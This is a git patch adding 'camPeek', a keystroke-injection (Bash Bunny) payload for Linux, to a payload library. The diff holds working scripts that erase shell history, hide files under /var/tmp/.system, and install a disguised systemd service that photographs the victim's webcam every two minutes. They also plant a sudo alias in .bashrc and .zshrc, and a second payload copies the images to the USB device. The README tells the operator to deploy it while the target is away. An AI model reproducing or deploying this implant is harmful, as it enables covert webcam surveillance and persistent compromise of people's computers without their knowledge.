From 7bd90b7308260397a638fde6765459a7b8288836 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 1 Apr 2022 21:35:39 +0530 Subject: [PATCH] uploaded camPeek (#508) * uploaded camPeek camPeek payload peeks through targets web cam and capture images * Delete payload.txt * uploading payload --- payloads/library/execution/camPeek/README.md | 55 ++++++++++++++++++ .../execution/camPeek/camPeek/payload.sh | 18 ++++++ .../library/execution/camPeek/camPeek/shell | 12 ++++ .../execution/camPeek/camPeek/systemBus | 5 ++ .../execution/camPeek/switch1/payload.txt | 56 +++++++++++++++++++ .../execution/camPeek/switch2/payload.txt | 43 ++++++++++++++ 6 files changed, 189 insertions(+) create mode 100644 payloads/library/execution/camPeek/README.md create mode 100644 payloads/library/execution/camPeek/camPeek/payload.sh create mode 100644 payloads/library/execution/camPeek/camPeek/shell create mode 100644 payloads/library/execution/camPeek/camPeek/systemBus create mode 100644 payloads/library/execution/camPeek/switch1/payload.txt create mode 100644 payloads/library/execution/camPeek/switch2/payload.txt diff --git a/payloads/library/execution/camPeek/README.md b/payloads/library/execution/camPeek/README.md new file mode 100644 index 00000000..4c6863c5 --- /dev/null +++ b/payloads/library/execution/camPeek/README.md @@ -0,0 +1,55 @@ +## About: +* Title: camPeek +* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny. + +### Features: +* Robust Payload for capturing targets images. +* No additional dependencies required. +* Persistent. +* Autostart payload on boot. + +### Payload: +* Payload is divided into two modules: +1) Deployment: In this stage payload is deployed in targets system. +2) Exfiltration: Storing saved loot from targets system in bunny. + +### Payload Script's Workflow: +* Stop storing histroy. +* Grep bunny's mount point of bunny. +* Creating hidden directory in /var/tmp/..... for obfuscation. +* Copying ffmpeg and image capturing mechanism in target's system. +* Creating systemd service for persistance and triggering mechanism for autostart. + +### Changes to be made: +* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Note: +* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory. +* Due to big size of binary, it is not provided in this repo. +* Craete directory name `camPeek` in `/loot/` for storing captured images. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| switch1/payload.txt | /payloads/switch1/ | +| switch2/payload.txt | /payloads/switch2/ | +| camPeek/ | /payloads/libray/ | + +### Usage: +1. Deploy first payload during absence of target using `switch1`. +2. Execute second payload during absence of target to store captured images in bunny using `switch2`. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh new file mode 100644 index 00000000..3759ce12 --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/ +chmod +x /var/tmp/.system/ffmpeg +mkdir /var/tmp/.system/sysLog +cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +cp -r $mntt/payloads/library/camPeek/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/camPeek/camPeek/shell b/payloads/library/execution/camPeek/camPeek/shell new file mode 100644 index 00000000..2b46e3d3 --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/shell @@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc +fi diff --git a/payloads/library/execution/camPeek/camPeek/systemBus b/payloads/library/execution/camPeek/camPeek/systemBus new file mode 100644 index 00000000..f23d223c --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/systemBus @@ -0,0 +1,5 @@ +while true; +do + /var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png + sleep 120 +done diff --git a/payloads/library/execution/camPeek/switch1/payload.txt b/payloads/library/execution/camPeek/switch1/payload.txt new file mode 100644 index 00000000..c251c817 --- /dev/null +++ b/payloads/library/execution/camPeek/switch1/payload.txt @@ -0,0 +1,56 @@ +# Title: camPeek +# Description: camPeek payload peeks through targets web cam and capture images. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 12000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/camPeek/switch2/payload.txt b/payloads/library/execution/camPeek/switch2/payload.txt new file mode 100644 index 00000000..b478df1f --- /dev/null +++ b/payloads/library/execution/camPeek/switch2/payload.txt @@ -0,0 +1,43 @@ +# Title: camPeek +# Description: camPeek payload's exfilteration module to move captured images to bunny. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +# create directory named camPeek in /loot/ +Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER